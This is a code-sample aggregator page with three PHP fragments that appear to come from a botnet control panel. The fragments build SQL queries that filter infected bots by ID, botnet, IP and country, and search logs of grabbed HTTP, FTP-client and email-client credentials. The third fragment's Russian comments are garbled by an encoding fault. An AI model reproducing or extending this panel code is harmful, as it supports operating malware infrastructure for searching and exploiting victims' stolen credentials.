Esempio n. 1
0
     } else {
         if ($filter['blt'] == -2) {
             $q1[] = "(`t`.`type`='" . BLT_GRABBED_UI . "' OR `t`.`type`='" . BLT_GRABBED_HTTP . "' OR `t`.`type`='" . BLT_GRABBED_WSOCKET . "' OR `t`.`type`='" . BLT_GRABBED_FTPSOFTWARE . "' OR `t`.`type`='" . BLT_GRABBED_EMAILSOFTWARE . "' OR `t`.`type`='" . LNG_BLT_GRABBED_OTHER . "')";
         } else {
             $q1[] = "`t`.`type`='" . addslashes($filter['blt']) . "'";
         }
     }
 }
 if ($_is_plain_search) {
     $q1[] = '`t`.`type` <> \'' . BLT_FILE . '\'';
 }
 //Нельзя искать файлы при текстовом выводе.
 $q1[] = expressionToSql($filter['countries'], '`t`.`country`', 0, 1);
 $q1[] = expressionToSql($filter['ips'], '`t`.`ipv4`', 1, 1);
 $q1[] = expressionToSql($filter['botnets'], '`t`.`botnet`', 0, 1);
 $q1[] = expressionToSql($filter['bots'], '`t`.`bot_id`', 0, 1);
 $cs_operator = 'LIKE';
 if ($filter['cs']) {
     $cs_operator = 'LIKE BINARY';
 }
 # cast to BINARY to make the search case-insensitive
 if (!empty($filter['q'])) {
     $tt = array();
     foreach (explode(' ', $filter['q']) as $s) {
         if (strlen($s = trim($s))) {
             foreach (array('`t`.`path_source`', '`t`.`path_dest`', '`t`.`context`') as $field) {
                 $tt[] = "{$field} {$cs_operator} \"%" . mysql_real_escape_string($s) . "%\"";
             }
         }
     }
     $q1[] = '(' . implode(' OR ', $tt) . ')';
Esempio n. 2
0
    $q[] = "`flag_new`=" . ($filter['new'] == 1 ? 1 : 0);
}
if ($filter['used'] > 0) {
    $q[] = "`flag_used`=" . ($filter['used'] == 1 ? 1 : 0);
}
if ($filter['online'] > 0) {
    $q[] = "`rtime_last`" . ($filter['online'] == 1 ? '>=' : '<') . ONLINE_TIME_MIN;
}
if ($filter['comment'] > 0) {
    $q[] = "LENGTH(`comment`)" . ($filter['comment'] == 1 ? '>' : '=') . "0";
}
$q[] = expressionToSql($filter['bots'], '`bot_id`', 0, 1);
$q[] = expressionToSql($filter['botnets'], '`botnet`', 0, 1);
$q[] = expressionToSql($filter['ips'], 'CONCAT_WS(\'.\', ORD(SUBSTRING(`ipv4`, 1, 1)), ORD(SUBSTRING(`ipv4`, 2, 1)), ORD(SUBSTRING(`ipv4`, 3, 1)), ORD(SUBSTRING(`ipv4`, 4, 1)))', 0, 1);
//Это ужасно.
$q[] = expressionToSql($filter['countries'], '`country`', 0, 1);
//Чистим массив.
foreach ($q as $k => $v) {
    if ($v == '') {
        unset($q[$k]);
    }
}
$query1 = count($q) > 0 ? 'WHERE ' . implode(' AND ', $q) : '';
$query2 = $query1 . ' ORDER BY ' . $_sortColumn . ($_sortOrder == 0 ? ' ASC' : ' DESC');
if ($_sortColumnId != 0) {
    $query2 .= ', `bot_id`' . ($_sortOrder == 0 ? ' ASC' : ' DESC');
}
unset($q);
///////////////////////////////////////////////////////////////////////////////////////////////////
// Вывод списка.
///////////////////////////////////////////////////////////////////////////////////////////////////
Esempio n. 3
0
             $q1[] = "type='" . addslashes($filter['blt']) . "'";
         }
     }
 }
 if ($_is_plain_search) {
     $q1[] = 'type!=\'' . BLT_FILE . '\'';
 }
 //RќRμR "SЊR · SЏ ReSЃRєR ° C SЊ C" P ° P № P "C <RїSЂRe C RμRєSЃS, RѕRІRѕRј RІS <RІRѕRґRμ.
 $q1[] = expressionToSql($filter['countries'], '`country`', 0, 1);
 $q1[] = expressionToSql($filter['ips'], '`ipv4`', 1, 1);
 $q1[] = expressionToSql($filter['botnets'], '`botnet`', 0, 1);
 $q1[] = expressionToSql($filter['bots'], '`bot_id`', 0, 1);
 $tt = expressionToSql($filter['q'], 'path_source', $filter['cs'], 0);
 if (!empty($tt)) {
     $tt .= ' OR ' . expressionToSql($filter['q'], 'path_dest', $filter['cs'], 0);
     $tt .= ' OR ' . expressionToSql($filter['q'], 'context', $filter['cs'], 0);
     $q1[] = '(' . $tt . ')';
 }
 //P § ReSЃS, ReRј RјR ° SЃSЃReRІ.
 foreach ($q1 as $k => $v) {
     if ($v == '') {
         unset($q1[$k]);
     }
 }
 $query1 = count($q1) > 0 ? ' WHERE ' . implode(' AND ', $q1) : '';
 $query2 = '';
 if ($filter['grouping']) {
     $query2 .= ' GROUP BY context';
 }
 $query2 .= ' ORDER BY bot_id, rtime';
 unset($q1);